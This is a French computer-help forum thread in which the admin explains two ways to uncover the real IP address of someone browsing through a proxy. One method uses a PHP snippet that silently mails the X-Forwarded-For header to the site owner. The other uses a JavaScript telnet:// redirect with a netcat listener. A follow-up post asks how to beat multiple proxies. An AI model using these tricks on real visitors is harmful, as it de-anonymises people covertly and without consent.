xp-pc-configuration-aide-tuto-logiciel-lien-reseau
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.

xp-pc-configuration-aide-tuto-logiciel-lien-reseau

xp-pc-configuration-aide-tuto-logiciel-lien-reseau-windows
 
AccueilAccueil  PortailPortail  GalerieGalerie  Dernières imagesDernières images  RechercherRechercher  S'enregistrerS'enregistrer  ConnexionConnexion  
Rechercher
 
 

Résultats par :
 
Rechercher Recherche avancée
Derniers sujets
» Trouver une ip derriere proxy
Trouver une ip derriere proxy Icon_minitimeVen 10 Fév - 17:27 par Gulnos

» Alohaaaaaaaaaaaa
Trouver une ip derriere proxy Icon_minitimeLun 2 Fév - 23:47 par bonemine

» bonemine is here
Trouver une ip derriere proxy Icon_minitimeLun 26 Jan - 18:26 par Quick

» Graver en maximisant la taille du CD avec nero
Trouver une ip derriere proxy Icon_minitimeVen 2 Jan - 22:05 par Admin

» Changez l'icône du disque dur
Trouver une ip derriere proxy Icon_minitimeVen 2 Jan - 21:14 par Admin

» Comment cacher son identificateur sur le Web :
Trouver une ip derriere proxy Icon_minitimeVen 2 Jan - 21:10 par Admin

» Astuces memoire virtuel
Trouver une ip derriere proxy Icon_minitimeVen 2 Jan - 20:53 par Admin

» Arrêtez l'ordinateur plus rapidement
Trouver une ip derriere proxy Icon_minitimeVen 2 Jan - 20:36 par Admin

» Optimiser les performances de son disque dur NTFS
Trouver une ip derriere proxy Icon_minitimeVen 2 Jan - 15:28 par Admin

Navigation
 Portail
 Index
 Membres
 Profil
 FAQ
 Rechercher
Partenaires
Forum gratuit


Tchat Blablaland
Galerie
Trouver une ip derriere proxy Empty
Qui est en ligne ?
Il y a en tout 3 utilisateurs en ligne :: 0 Enregistré, 0 Invisible et 3 Invités

Aucun

Le record du nombre d'utilisateurs en ligne est de 124 le Mer 26 Sep - 2:22
Le deal à ne pas rater :
Cdiscount : -30€ dès 300€ d’achat sur une sélection Apple
Voir le deal

 

 Trouver une ip derriere proxy

Aller en bas 
2 participants
AuteurMessage
Admin
Administrateurs
Administrateurs
Admin


Nombre de messages : 196
Age : 48
Localisation : nancy
Date d'inscription : 22/12/2008

Trouver une ip derriere proxy Empty
MessageSujet: Trouver une ip derriere proxy   Trouver une ip derriere proxy Icon_minitimeVen 2 Jan - 15:04

* Trouver une adresse IP derriere un proxy *

* (2 méthodes) *
Je vais vous exposer ici quelques techniques vous permettant de recuperer l'IP reelle d'une personne se connectant au net par l'intermediare d'un proxy.

En effet dans ce cas vous voyez l'IP du proxy, et non la sienne.C'est le but d'ailleurs du proxy, mais on va se montrer plus malin que lui ! ;-)

----------------------------------------------------------
* 1 ere methode,
----------------
elle vous permettra de recevoir dans votre boite mail l'IP d'un gars qui se promene sur une de vos pages sur un site web.
Pour cela votre site doit etre heberge sur un serveur supportant PHP, avec la fonction mail();activee (actuellement c'est le cas de Lycos/Multimania, les autres je sais pas).

L'idee est donc que les proxys sur lesquels se connectent les victimes envoient souvent dans le Header des infos,dont la fameuse IP.
Ces donnees envoyees par le serveur se nomment les VARIABLES D'ENVIRONNEMENT.
Les variables d'environnement standard permettent d'ailleurs de recuperer l'IP d'un gars, mais ce n'est pas le but de notre tuto...Ici
nous nous interesserons aux variables d'environnement propres aux proxies HTTP, qui sont au nombre de 6 :
HTTP_PRAGMA Ancien mecanisme de gestion des methodes de cache des pages d'un serveur HTTP
HTTP_CACHE_CONTROL Indication concernant les preferences du client HTTP en matiere de cache
HTTP_CACHE_INFO Utilise par certains proxys pour indiquer au serveur HTTP combien de clients HTTP ont effectue cette requete par son intermediaire
HTTP_PROXY_CONNECTION Seulement definie par certains proxys lorsque le client HTTP effectue sa requete par leur intermediaire
HTTP_VIA Adresse, port utilise, nom et version du proxy utilise pour la requete. Seulement definie par certains proxys
HTTP_X_FORWARDED_FOR Utilise par certains proxys pour indiquer l'adresse de la machine cliente pour laquelle ils effectuent a requete HTTP

Ici la variable qui nous interesse est la derniere, HTTP_X_FORWARDED_FOR, qui contient l'IP du gars derriere le proxy.
L'idee est donc que le serveur sur lequel est heberge votre page PHP lit les informations envoyees par le proxy se connectant a lui,donc cette variable.
Il est donc capable de la restituer par la fonction PHP getenv("param"); qui recupere la variable d'environnement nommee "param".

Donc,demande a votre serveur d'hebergement de stocker dans la variable $vraieip la vraie IP, c'est a dire le contenu de la variable d'environnement HTTP_X_FORWARDED_FOR.

Vous pouvez l'afficher a l'ecran pour faire peur au gars, avec "print $vraieip;"
mais notre but est de la recuperer discretement, en nous l'envoyant par mail. Il suffit de coder ceci :
$vraieip = getenv("HTTP_X_FORWARDED_FOR");mail("votre_mail@serveur.ext", "IP recoltees sur ma page internet", $vraieip);?>
et si comme je vous le disais au debut votre serveur d'hebergement accepte la fonction mail(); c'est dans la poche !
Par contre si le gars ne passe pas par un proxy, la variable reste vide, vous devez donc envoyer par mail l'IP provenant deHTTP_X_FORWARDED_FOR, mais aussi celle de la variable d'environnement classique permettant de recuperer l'IP normale

------------------------------------------------------------
* 2eme methode :
----------------
Elle consiste toujours a amener le gars sur une page internet prevue par vos soins :p
Cette fois-ci pas besoin de PHP, juste un script javascript, a lancer au chargement de la page, le voici :

function Gruss()
{
window.location.href = 'telnet://Newffr.zzn.com:25'
}

-------
Alors que vous pensiez etre anonyme derriere votre proxys... Je vous demontre le contraire !
Pourquoi ? Comment ?
Simplement par ce que le proxy utilise le protocole HTTP, et n'est fonctionnel qu'a travers
les structures utilisant HTTP, or la j'ai engendre sur votre navigateur une connexion Telnet
a mon serveur sur le port 25 (sendmail) ...
Je verrai alors dans mes logs votre vraie IP c'est une application reelle !
Mais le meilleur n'est pas la ...
Ici j'ai utilise une connexion reelle de Telnet qui se dirige vers un serveur SMTP dump
mais j'aurais tres bien pu rediriger la connexion vers une petite application qui se
charge de garder les logs et DANS CE CAS VOUS N'AURIEZ SIMPLEMENT RIEN VU !
Donc ne croyez pas que le proxy soit quelque chose de fiable, bien au contraire !
-------
Maintenant on regarde plus pres comment ca marche...
Vous devez remplacer Newffr.zzn.com par votre serveur, ou mieux votre machine (entre votre IP, je sais c'est dangereux).
C'est ici qu'intervient l'utilisation du logiciel NetCat (c'est le programme qui garde les logs)
Il suffit dans le script de mettre votre IP au lieu du serveur, et sur votre machine
de lancer NetCat en mode ecoute (listen) sur le port 25 (port sendmail). La commande est, apres avoir lance natcat,
"-l -p 25".
Ainsi vous ecoutez tout ce qui vient sur votre port 25.
Dans notre exemple le script ouvre chez la victime ouvre son port telnet (23) et se connecte a votre IP au port 25.
Le script si votre IP est 145.167.4.34 sera :
function Gruss()
{
window.location.href = 'telnet://145.167.4.34:25'
}


Cette technique oblige donc le navigateur du gars a se connecter a votre IP sur votre port 25.
En effet les proxy filtrent les connections HTTP (port 8080), mais pas Telnet (25), donc le fait d'obliger le gars a
se connecter a votre serveur (netcat en fait) vous devoilera son IP en regardant dans vos logs de netcat.
Voila 2 methodes pour trouver une adresse IP derriere un proxy !
Revenir en haut Aller en bas
https://monpc.forumactif.org
Gulnos




Nombre de messages : 1
Date d'inscription : 10/02/2012

Trouver une ip derriere proxy Empty
MessageSujet: Re: Trouver une ip derriere proxy   Trouver une ip derriere proxy Icon_minitimeVen 10 Fév - 17:27

Bonjour,
Vous dites qu'il est techniquement possible d'identifier quelqu'un qui se cache derrière un proxy, mais, si cette personne utilise plusieurs proxy et bloque son port 25, est il encore possible de l'identifier ?

Existe t'il un autre protocole utilisable par javascript qui permette une connection directe entre le client et le serveur ?

est il possible d’exécuter une boucle testant une requête sur plusieurs ports pour identifier son ip ?
Revenir en haut Aller en bas
 
Trouver une ip derriere proxy
Revenir en haut 
Page 1 sur 1

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
xp-pc-configuration-aide-tuto-logiciel-lien-reseau :: SECURITE PC - RESEAUX-
Sauter vers: